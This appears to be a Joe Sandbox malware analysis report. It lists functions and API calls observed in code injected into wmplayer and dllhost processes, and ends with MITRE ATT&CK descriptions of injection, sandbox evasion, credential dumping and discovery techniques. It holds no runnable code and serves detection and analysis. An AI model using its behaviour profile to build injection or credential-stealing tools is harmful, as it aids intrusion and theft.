Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 89b5908d79ee5c7998c1e537674b4d9a246c484fd73087313aa0e14bd25b86fc
Instruction ID: de35ee8d27505894d12ad7ada3603d43a9635e0952a759b06a07495a276958f0
Opcode Fuzzy Hash: 89b5908d79ee5c7998c1e537674b4d9a246c484fd73087313aa0e14bd25b86fc
Instruction Fuzzy Hash: 2301C071204A0C8FEB44FB18D8C59A9B3E9FBD8314F50472AE84AC7141EF74EA498781

Function 000002034329D47C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 000002034329D4CE

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 7f56c72cfcae8d80b4586900bfcddcfac53d155e92e589ebe9cb41befa58808c
Instruction ID: 4e165c574b65c31e536374d0835dd3bb5e952282a69a462a436e49027e702c76
Opcode Fuzzy Hash: 7f56c72cfcae8d80b4586900bfcddcfac53d155e92e589ebe9cb41befa58808c
Instruction Fuzzy Hash: 3A115E30200A198FEF65DF29E8D83A572E4EF54355F14157AD809CF1DAC7B09C40CB91

Function 0000020343282908 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0000020343282940

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5c31a46f6d445521225acd11504a663c19e0e3d445cc9bb841d99d51f31de999
Instruction ID: 94e5e2b24bc375d7a0210b271f25dcb95e7ee0a7aa72168b30db48ee6a863db4
Opcode Fuzzy Hash: 5c31a46f6d445521225acd11504a663c19e0e3d445cc9bb841d99d51f31de999
Instruction Fuzzy Hash: C0014931714B098FEB58EB7DECC8A2533D9FB8A316B144174E80AC7145EA3A9C42CB41

Function 00007DF445C52F60 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

SetWinEventHook.USER32 ref: 00007DF445C52FCD

Memory Dump Source

Source File: 00000010.00000002.2883976721.00007DF445C51000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7df445c51000_wmplayer.jbxd

Similarity

API ID: EventHook
String ID:
API String ID: 3661607649-0
Opcode ID: e6b188324f96a1e03f166e4287a2793acb406422b2b30f8b11d607c185f61fee
Instruction ID: 8f604a07f69f8e73e346c837649277d8cc2209f509a73310d5d48fc878f9ab5b
Opcode Fuzzy Hash: e6b188324f96a1e03f166e4287a2793acb406422b2b30f8b11d607c185f61fee
Instruction Fuzzy Hash: B5115E32818A998EEF54FFA0DC697AB72A0FB50714F900A29D08BD21D1DBBDA454D781

Function 000002034328BE74 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 000002034328BECE

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 12b8579c94d980b36ee7f4a10cede83320d2d98dca1dd7d6c3e056b03176412d
Instruction ID: d2968ca87c46372850e01403750f6f69cfb9bb6b72d3357c46122d7885d3a12a
Opcode Fuzzy Hash: 12b8579c94d980b36ee7f4a10cede83320d2d98dca1dd7d6c3e056b03176412d
Instruction Fuzzy Hash: B801CD30318F4C4FFB89EB38E89936932DAFB54305F50496A600AC72D3DA74CE048741

Function 0000020343282B54 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 0000020343282B74

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 87c9353dd802639144902710b699223c01dddb704a7af5c883605137a5967ae2
Instruction ID: 75df8f26bf641db08a0814edf9b215de7dd43e87c98b25ba32d10ffa0d433272
Opcode Fuzzy Hash: 87c9353dd802639144902710b699223c01dddb704a7af5c883605137a5967ae2
Instruction Fuzzy Hash: 2BF03061616B194BF758EEBAFCC83663259D785323F144E3A9405CB186E9B989414241

Function 000002034328697C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetProcAddressForCaller.KERNELBASE ref: 00000203432869A3

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: AddressCallerProc
String ID:
API String ID: 2663294120-0
Opcode ID: 2281c8d1acfe59b1600e3eaaeea13a07426774ac218d4fd6d2e2e37010b99408
Instruction ID: 4ed497f5c18a84279b4e094888afa4c6bcdb3d12939dccfdca503050c3820a37
Opcode Fuzzy Hash: 2281c8d1acfe59b1600e3eaaeea13a07426774ac218d4fd6d2e2e37010b99408
Instruction Fuzzy Hash: 09E0C211704D190BEB6CA1AE64CCA7BA1CAD7DC173704067BE51DC329AED50CC824390

Function 00007DF445C31290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlAddFunctionTable.KERNEL32 ref: 00007DF445C312BD

Memory Dump Source

Source File: 00000010.00000003.2266531166.00007DF445C31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_7df445c31000_wmplayer.jbxd

Similarity

API ID: FunctionTable
String ID:
API String ID: 1252446317-0
Opcode ID: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
Instruction ID: acfcce9a90c94cd434af0cfaa13bde2401253c7219093a99e7026631d2720a39
Opcode Fuzzy Hash: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
Instruction Fuzzy Hash: 14E04F309049095FEFA8E61DC849B503AE0EB5830AF604669D505C9291CB7A949BCF81

Function 00007DF445C51708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlAddFunctionTable.KERNEL32 ref: 00007DF445C51735

Memory Dump Source

Source File: 00000010.00000002.2883976721.00007DF445C51000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7df445c51000_wmplayer.jbxd

Similarity

API ID: FunctionTable
String ID:
API String ID: 1252446317-0
Opcode ID: 62df2a061ef9a83e40c3da8f8fbf33d98cfabe8aaf6c816d3fbd47a45bbcd3fe
Instruction ID: 8197bba1c2ef05a31d6ef239973bd0b122fdef528937cccf1ac713140af5f21e
Opcode Fuzzy Hash: 62df2a061ef9a83e40c3da8f8fbf33d98cfabe8aaf6c816d3fbd47a45bbcd3fe
Instruction Fuzzy Hash: 06E04F305409094BEFA8E62DC84D75036F0EB5830AF604269D445CA291CB7994DBCF42

Function 0000020343283C88 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlAddFunctionTable.KERNEL32 ref: 0000020343283CB5

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: FunctionTable
String ID:
API String ID: 1252446317-0
Opcode ID: 9b7d75a84148f5670434543918403749cff5ebc7ae0c8f65432214b84f97b8e4
Instruction ID: 5f469cb00b52f07060ee5b5e02ad95849db8022eea20fc3e8ad74f1cc8464459
Opcode Fuzzy Hash: 9b7d75a84148f5670434543918403749cff5ebc7ae0c8f65432214b84f97b8e4
Instruction Fuzzy Hash: 2FE04F34201A054BEBACDB1DC84D3943AD0E79830AF604258D505CA292CB79C4DBCF81

Function 00000203432874A0 Relevance: 1.5, APIs: 1, Instructions: 276COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 000002034328757E

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 99fafe51efca8da9e0be5ad8b3cd18069f463c7afb43d55029f687fd3cd42bf1
Instruction ID: 23ecca992708a1f29b5e69431c02b4f00d8b14f75b2e4da934b816318e0bafb5
Opcode Fuzzy Hash: 99fafe51efca8da9e0be5ad8b3cd18069f463c7afb43d55029f687fd3cd42bf1
Instruction Fuzzy Hash: 0E918430218B098FEB49EF19D4C9AEA73E4FF54300F504A59E44ACB197DE70E945CB81

Function 00007DF445C41290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlAddFunctionTable.KERNEL32 ref: 00007DF445C412BD

Memory Dump Source

Source File: 00000010.00000002.2883795495.00007DF445C41000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7df445c41000_wmplayer.jbxd

Similarity

API ID: FunctionTable
String ID:
API String ID: 1252446317-0
Opcode ID: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
Instruction ID: 4e71a7b7e9e7dd1954dafe3cbcaa236458c9c9e1e5dfe0a32a312f64e9a8ef6c
Opcode Fuzzy Hash: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
Instruction Fuzzy Hash: E2E04F309049054BEFA8E61DC909B5136E0EB5C306F604669D505C9295DB79989BCF81

Function 0000020343286950 Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 0000020343286972

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction ID: e126632ff20d6931e08f6ac4e7ce8a9ebee5e38436814ee5cc65ca653991f764
Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction Fuzzy Hash: 1DD0A710320E0D0BEA5CA77D6CD973961DAE7CC221F501A3AB50AC3287D998CD560340

Analysis Process: dllhost.exePID: 7464, Parent PID: 7220COMMON

Execution Graph

Execution Coverage:	2.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	199
Total number of Limit Nodes:	5

Executed Functions

Function 000001D3CF5A385C Relevance: 1.8, APIs: 1, Instructions: 269
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001D3CF5A3484: GetVolumeInformationW.KERNELBASE ref: 000001D3CF5A35BB

NtQuerySystemInformation.NTDLL ref: 000001D3CF5A39CF

Memory Dump Source

Source File: 00000011.00000002.2881302689.000001D3CF5A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D3CF5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d3cf5a0000_dllhost.jbxd

Similarity

API ID: Information$QuerySystemVolume
String ID:
API String ID: 2187445334-0
Opcode ID: bbe3e2a7d344cf85ec3a4c395e4fae651ef179c001aa808880b53e11515cf003
Instruction ID: 1ac129b90f5373b31ac0711d3565e84dd4097abd87c0fc88ff33d39059515495
Opcode Fuzzy Hash: bbe3e2a7d344cf85ec3a4c395e4fae651ef179c001aa808880b53e11515cf003
Instruction Fuzzy Hash: 94918131219E094FE7A5EF74C8596E673E1FB68301F104A2B956BC32A1EF3496458B82

Function 000001D3CF5A2AC4 Relevance: .3, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.2881302689.000001D3CF5A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D3CF5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d3cf5a0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f2ab5fabc2a0e36146663c7120b09b4177702f3456a2b2b11960e1abc9f1dee
Instruction ID: d17e7c936a7ccbca67ca27114beb61bae1b688f361e35eb0433493555414d1ca
Opcode Fuzzy Hash: 0f2ab5fabc2a0e36146663c7120b09b4177702f3456a2b2b11960e1abc9f1dee
Instruction Fuzzy Hash: 8CB1263222DE094BE756EB28C491AEA73E1FB94304F00471BA5A7D7196DE34E715CF82

Function 000001D3CF5C6E1C Relevance: 7.6, APIs: 5, Instructions: 130
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 000001D3CF5C6E25
WSAStartup.WS2_32 ref: 000001D3CF5CA3BC
socket.WS2_32 ref: 000001D3CF5CA42B
getsockopt.WS2_32 ref: 000001D3CF5CA45F
socket.WS2_32 ref: 000001D3CF5CA494

Memory Dump Source

Source File: 00000011.00000002.2881302689.000001D3CF5A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D3CF5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d3cf5a0000_dllhost.jbxd

Similarity

API ID: socket$ErrorModeStartupgetsockopt
String ID:
API String ID: 2955919026-0
Opcode ID: 2b6fb284fe353a32addd25f3df84090d0ecaa741c51bc7f7119ce81397f063fd
Instruction ID: ed284f627050b1e7159cc289cd5ab25f0dee1677eeccf793cb33bff085d68905
Opcode Fuzzy Hash: 2b6fb284fe353a32addd25f3df84090d0ecaa741c51bc7f7119ce81397f063fd
Instruction Fuzzy Hash: D2412475618A488FE758EF28E89969977E1FB98300F50872FE157D32E5DF388508CB41

Function 000001D3CF5A3658 Relevance: 3.2, APIs: 2, Instructions: 176
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE ref: 000001D3CF5A3792
MapViewOfFile.KERNELBASE ref: 000001D3CF5A37B9

Memory Dump Source

Source File: 00000011.00000002.2881302689.000001D3CF5A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D3CF5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d3cf5a0000_dllhost.jbxd

Similarity

API ID: File$CreateMappingView
String ID:
API String ID: 3452162329-0
Opcode ID: bece0600f44f861c643c7654aa2f2e3f03c84c914f92a664447b07396d3fe0fc
Instruction ID: 6486fdba3f35364edf59aa700586c66fb04e4adbed0b2fbdbfbf6de29b2c4249
Opcode Fuzzy Hash: bece0600f44f861c643c7654aa2f2e3f03c84c914f92a664447b07396d3fe0fc
Instruction Fuzzy Hash: 49517F3152CB888BD725EB25C8857FAB7E0FB95301F004A2FA5EAD2191DF349605CB93

Function 000001D3CF5C79E0 Relevance: 3.1, APIs: 2, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIoCompletionPort.KERNELBASE ref: 000001D3CF5C7A42
SetFileCompletionNotificationModes.KERNEL32 ref: 000001D3CF5C7A88

Memory Dump Source

Source File: 00000011.00000002.2881302689.000001D3CF5A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D3CF5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d3cf5a0000_dllhost.jbxd

Similarity

API ID: Completion$CreateFileModesNotificationPort
String ID:
API String ID: 3755109111-0
Opcode ID: 84be1d14cb65808509a283a73e814be659c70036e97280a94885828e4d56e97e
Instruction ID: 0ab85762360aa43503d856b40673e47d955b09cfe7fb07d522a9dd5cedd4001c
Opcode Fuzzy Hash: 84be1d14cb65808509a283a73e814be659c70036e97280a94885828e4d56e97e
Instruction Fuzzy Hash: 3831A2312299154FFBA89B28AC853B933D4F758315F50016BEA2BD35D2DB25CE858783

Function 000001D3CF5A3484 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE ref: 000001D3CF5A35BB

Memory Dump Source

Source File: 00000011.00000002.2881302689.000001D3CF5A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D3CF5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d3cf5a0000_dllhost.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: cbef5665e4e33130d77fabd6912371dd21022a2eb90503feaf05fbace3e60585
Instruction ID: 30427df39740efd47f416165fe28dfebb064b0f3fdb880aa2cf75be19733c535
Opcode Fuzzy Hash: cbef5665e4e33130d77fabd6912371dd21022a2eb90503feaf05fbace3e60585
Instruction Fuzzy Hash: E451333112C7488BE76AEB28C4957EBB3E0FB94304F504A2EE19BD3191DF759605CB42

Function 000001D3CF5C7DD0 Relevance: 1.6, APIs: 1, Instructions: 93
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 000001D3CF5C7DFD

Memory Dump Source

Source File: 00000011.00000002.2881302689.000001D3CF5A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D3CF5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d3cf5a0000_dllhost.jbxd

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: 164deb1e36558be1443e0572fd883e2d2b2af36008d1889a4b6708111c61d883
Instruction ID: e66a23df3577e9ea311293c4b841b7a57c34b8aa2c0896d8a725a23ecdf175c2
Opcode Fuzzy Hash: 164deb1e36558be1443e0572fd883e2d2b2af36008d1889a4b6708111c61d883
Instruction Fuzzy Hash: C621F7323185044FEB48AF38A8897A533D1EB48325F20466BE93BD76D6DF388D458652

Function 000001D3CF5A28D4 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 000001D3CF5A2949

Memory Dump Source

Source File: 00000011.00000002.2881302689.000001D3CF5A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D3CF5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d3cf5a0000_dllhost.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 147b7861b8d55a5ae4162ffc4259640c3a28b81395385b0f304c643425426fcc
Instruction ID: 3e79cedda84e51c08cd7a1ad4f9bac6aee172972d5a77c345dad251edf7043a4
Opcode Fuzzy Hash: 147b7861b8d55a5ae4162ffc4259640c3a28b81395385b0f304c643425426fcc
Instruction Fuzzy Hash: 0D01443272AA090FEA99B37448563FD23D6EBD5311F44036B6A2AE31D2EE14CB214653

Function 000001D3CF5A28A0 Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddressForCaller.KERNELBASE ref: 000001D3CF5A28C7

Memory Dump Source

Source File: 00000011.00000002.2881302689.000001D3CF5A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D3CF5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d3cf5a0000_dllhost.jbxd

Similarity

API ID: AddressCallerProc
String ID:
API String ID: 2663294120-0
Opcode ID: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
Instruction ID: 74d3e7ef1612f69b5368fa2625549a925055cd501289fd7f7709a15d530fa02b
Opcode Fuzzy Hash: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
Instruction Fuzzy Hash: C2E0C222719D090BAB6861AE248C6B652C6C7DC372B1402BBF52CC3295ED14CC510391

Function 000001D3CF5A7FF4 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,000001D3CF5A80FA,?,?,?,?,?,?,?,000001D3CF5A454C), ref: 000001D3CF5A8013

Memory Dump Source

Source File: 00000011.00000002.2881302689.000001D3CF5A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D3CF5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d3cf5a0000_dllhost.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: f9cead5ed533bf09888c19173bf4e4c63eb84cb88b8b7d93750e2c5822ebb7a4
Instruction ID: 6ad627f94ed5a93d3b69f3640bf44a76e4ed8351c87e58fc7e9b4747f5790b5b
Opcode Fuzzy Hash: f9cead5ed533bf09888c19173bf4e4c63eb84cb88b8b7d93750e2c5822ebb7a4
Instruction Fuzzy Hash: 5BE0483122690A4BFF5CFB65C4E87783795EB58302F50006B6526D22E3CE24DD56D741

Function 000001D3CF5A2874 Relevance: 1.5, APIs: 1, Instructions: 24
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001D3CF5A2896

Memory Dump Source

Source File: 00000011.00000002.2881302689.000001D3CF5A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D3CF5A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1d3cf5a0000_dllhost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction ID: 46c7b8a330e5dc2ecdc6e20b720c8df623627c650178061a5947a8bae05ce4cc
Opcode Fuzzy Hash: deadc42d593f6e2d9e8bf000e5cc548490ab76c2dd2841c06e942c08cce04583
Instruction Fuzzy Hash: E0D0A731335D0E1FEA48633D1C953B512C5E7DC325F51127BB51AC3281D958CD654341

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
